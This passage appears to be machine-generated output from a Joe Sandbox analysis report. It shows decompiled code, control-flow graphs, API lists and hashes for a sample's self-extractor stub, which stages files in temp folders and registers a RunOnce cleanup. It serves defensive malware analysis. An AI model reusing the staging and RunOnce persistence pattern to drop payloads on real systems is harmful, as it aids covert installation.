                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F2250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
• Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 178549006-2699677747
                                                                                                                                                                                                        • Opcode ID: 824fed67ca861b1a1df1f4884ce140e03bdda00a22b209605e8437ab00570cf8
                                                                                                                                                                                                        • Instruction ID: c4dcb2f009bf238ceba7c7ae25d6555e1d61694a3ef65e149dd4718664750e06
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 824fed67ca861b1a1df1f4884ce140e03bdda00a22b209605e8437ab00570cf8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6451D2B1A0421CABDB20AB64DC49FFB7B6DEF54700F4001A4FB49E6191DF759E89CA60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 1f55a0-1f55d9 call 1f468f LocalAlloc 235 1f55fd-1f560c call 1f468f 232->235 236 1f55db-1f55f1 call 1f44b9 call 1f6285 232->236 242 1f560e-1f5630 call 1f44b9 LocalFree 235->242 243 1f5632-1f5643 lstrcmpA 235->243 248 1f55f6-1f55f8 236->248 242->248 246 1f564b-1f5659 LocalFree 243->246 247 1f5645 243->247 250 1f565b-1f565d 246->250 251 1f5696-1f569c 246->251 247->246 254 1f58b7-1f58c7 call 1f6ce0 248->254 252 1f565f-1f5667 250->252 253 1f5669 250->253 255 1f589f-1f58b5 call 1f6517 251->255 256 1f56a2-1f56a8 251->256 252->253 257 1f566b-1f567a call 1f5467 252->257 253->257 255->254 256->255 260 1f56ae-1f56c1 GetTempPathA 256->260 269 1f589b-1f589d 257->269 270 1f5680-1f5691 call 1f44b9 257->270 264 1f56f3-1f5711 call 1f1781 260->264 265 1f56c3-1f56c9 call 1f5467 260->265 274 1f586c-1f5890 GetWindowsDirectoryA call 1f597d 264->274 275 1f5717-1f5729 GetDriveTypeA 264->275 272 1f56ce-1f56d0 265->272 269->254 270->248 272->269 276 1f56d6-1f56df call 1f2630 272->276 274->264 286 1f5896 274->286 278 1f572b-1f572e 275->278 279 1f5730-1f5740 GetFileAttributesA 275->279 276->264 287 1f56e1-1f56ed call 1f5467 276->287 278->279 284 1f5742-1f5745 278->284 279->284 285 1f577e-1f578f call 1f597d 279->285 289 1f576b 284->289 290 1f5747-1f574f 284->290 297 1f57b2-1f57bf call 1f2630 285->297 298 1f5791-1f579e call 1f2630 285->298 286->269 287->264 287->269 292 1f5771-1f5779 289->292 290->292 294 1f5751-1f5753 290->294 296 1f5864-1f5866 292->296 294->292 299 1f5755-1f5762 call 1f6952 294->299 296->274 296->275 308 1f57d3-1f57f8 call 1f658a GetFileAttributesA 297->308 309 1f57c1-1f57cd GetWindowsDirectoryA 297->309 298->289 307 1f57a0-1f57b0 call 1f597d 298->307 299->289 306 1f5764-1f5769 299->306 306->285 306->289 307->289 307->297 314 1f580a 308->314 315 
1f57fa-1f5808 CreateDirectoryA 308->315 309->308 316 1f580d-1f580f 314->316 315->316 317 1f5827-1f585c SetFileAttributesA call 1f1781 call 1f5467 316->317 318 1f5811-1f5825 316->318 317->269 323 1f585e 317->323 318->296 323->296
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E001F55A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E001F468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E001F468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0x1f9a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0x1f8b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0x1f8a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E001F6517(_t82, 0x7d2, 0, E001F3210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0x1f9a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0x1f91e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0x1f91e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E001F1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E001F6952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E001F597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E001F2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E001F658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0x1f91e4;
                                                                                                                                                                                                        																					E001F1781(0x1f91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E001F5467(0x1f91e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E001F2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E001F597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E001F5467(0x1f91e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0x1f91e4;
                                                                                                                                                                                                        											_t70 = E001F2630(0, 0x1f91e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0x1f91e4;
                                                                                                                                                                                                        												_t71 = E001F5467(0x1f91e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E001F597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0x1f8b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E001F5467(0x1f8b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E001F44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E001F6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x001f58b3
                                                                                                                                                                                                        0x001f58b5
                                                                                                                                                                                                        0x001f56a2
                                                                                                                                                                                                        0x001f56a2
                                                                                                                                                                                                        0x001f56a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f56ae
                                                                                                                                                                                                        0x001f56ae
                                                                                                                                                                                                        0x001f56b9
                                                                                                                                                                                                        0x001f56bf
                                                                                                                                                                                                        0x001f56c1
                                                                                                                                                                                                        0x001f56f3
                                                                                                                                                                                                        0x001f56f3
                                                                                                                                                                                                        0x001f5705
                                                                                                                                                                                                        0x001f570a
                                                                                                                                                                                                        0x001f5711
                                                                                                                                                                                                        0x001f5717
                                                                                                                                                                                                        0x001f5724
                                                                                                                                                                                                        0x001f5726
                                                                                                                                                                                                        0x001f5729
                                                                                                                                                                                                        0x001f5730
                                                                                                                                                                                                        0x001f5737
                                                                                                                                                                                                        0x001f573d
                                                                                                                                                                                                        0x001f5740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f572b
                                                                                                                                                                                                        0x001f572b
                                                                                                                                                                                                        0x001f572e
                                                                                                                                                                                                        0x001f5742
                                                                                                                                                                                                        0x001f5742
                                                                                                                                                                                                        0x001f5745
                                                                                                                                                                                                        0x001f576b
                                                                                                                                                                                                        0x001f576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5747
                                                                                                                                                                                                        0x001f5747
                                                                                                                                                                                                        0x001f574d
                                                                                                                                                                                                        0x001f574f
                                                                                                                                                                                                        0x001f5771
                                                                                                                                                                                                        0x001f5771
                                                                                                                                                                                                        0x001f5773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5751
                                                                                                                                                                                                        0x001f5751
                                                                                                                                                                                                        0x001f5753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5755
                                                                                                                                                                                                        0x001f575b
                                                                                                                                                                                                        0x001f5760
                                                                                                                                                                                                        0x001f5762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5764
                                                                                                                                                                                                        0x001f5764
                                                                                                                                                                                                        0x001f5769
                                                                                                                                                                                                        0x001f577e
                                                                                                                                                                                                        0x001f577e
                                                                                                                                                                                                        0x001f5781
                                                                                                                                                                                                        0x001f5788
                                                                                                                                                                                                        0x001f578d
                                                                                                                                                                                                        0x001f578f
                                                                                                                                                                                                        0x001f57b2
                                                                                                                                                                                                        0x001f57b8
                                                                                                                                                                                                        0x001f57bd
                                                                                                                                                                                                        0x001f57bf
                                                                                                                                                                                                        0x001f57cd
                                                                                                                                                                                                        0x001f57cd
                                                                                                                                                                                                        0x001f57dd
                                                                                                                                                                                                        0x001f57e3
                                                                                                                                                                                                        0x001f57ef
                                                                                                                                                                                                        0x001f57f5
                                                                                                                                                                                                        0x001f57f8
                                                                                                                                                                                                        0x001f580a
                                                                                                                                                                                                        0x001f580a
                                                                                                                                                                                                        0x001f57fa
                                                                                                                                                                                                        0x001f5802
                                                                                                                                                                                                        0x001f5802
                                                                                                                                                                                                        0x001f580d
                                                                                                                                                                                                        0x001f580f
                                                                                                                                                                                                        0x001f5830
                                                                                                                                                                                                        0x001f5836
                                                                                                                                                                                                        0x001f583d
                                                                                                                                                                                                        0x001f584b
                                                                                                                                                                                                        0x001f5851
                                                                                                                                                                                                        0x001f5855
                                                                                                                                                                                                        0x001f585a
                                                                                                                                                                                                        0x001f585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f585e
                                                                                                                                                                                                        0x001f585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f585e
                                                                                                                                                                                                        0x001f5811
                                                                                                                                                                                                        0x001f5817
                                                                                                                                                                                                        0x001f5819
                                                                                                                                                                                                        0x001f581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f581f
                                                                                                                                                                                                        0x001f5791
                                                                                                                                                                                                        0x001f5797
                                                                                                                                                                                                        0x001f579c
                                                                                                                                                                                                        0x001f579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f57a0
                                                                                                                                                                                                        0x001f57a9
                                                                                                                                                                                                        0x001f57ae
                                                                                                                                                                                                        0x001f57b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f57b0
                                                                                                                                                                                                        0x001f579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5769
                                                                                                                                                                                                        0x001f5762
                                                                                                                                                                                                        0x001f5753
                                                                                                                                                                                                        0x001f574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5864
                                                                                                                                                                                                        0x001f5864
                                                                                                                                                                                                        0x001f5864
                                                                                                                                                                                                        0x001f5717
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001F55CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 001F5638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 001F564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 001F5620
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F56B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 001F571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 001F5737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001F57CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001F57EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 001F5802
                                                                                                                                                                                                          • Part of subcall function 001F2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 001F2654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 001F5830
                                                                                                                                                                                                          • Part of subcall function 001F6517: FindResourceA.KERNEL32(001F0000,000007D6,00000005), ref: 001F652A
                                                                                                                                                                                                          • Part of subcall function 001F6517: LoadResource.KERNEL32(001F0000,00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001F6538
                                                                                                                                                                                                          • Part of subcall function 001F6517: DialogBoxIndirectParamA.USER32(001F0000,00000000,00000547,001F19E0,00000000), ref: 001F6557
                                                                                                                                                                                                          • Part of subcall function 001F6517: FreeResource.KERNEL32(00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001F6560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 001F5878
                                                                                                                                                                                                          • Part of subcall function 001F597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001F59A8
                                                                                                                                                                                                          • Part of subcall function 001F597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001F59AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-2610921595
                                                                                                                                                                                                        • Opcode ID: 16c06dc42ea2e0263095a4e8101e9e812e1b141fdc49391aa734674d264cba8d
                                                                                                                                                                                                        • Instruction ID: 9632e817a6e0767b76d9f0eab11aa51ef0a1ac3562a48dacd092fe8b42ebda1d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16c06dc42ea2e0263095a4e8101e9e812e1b141fdc49391aa734674d264cba8d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48814CB0A04A0CABDB24AB719C41BFE766F9F60350F440165F78AE2591EF748DC2CA60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
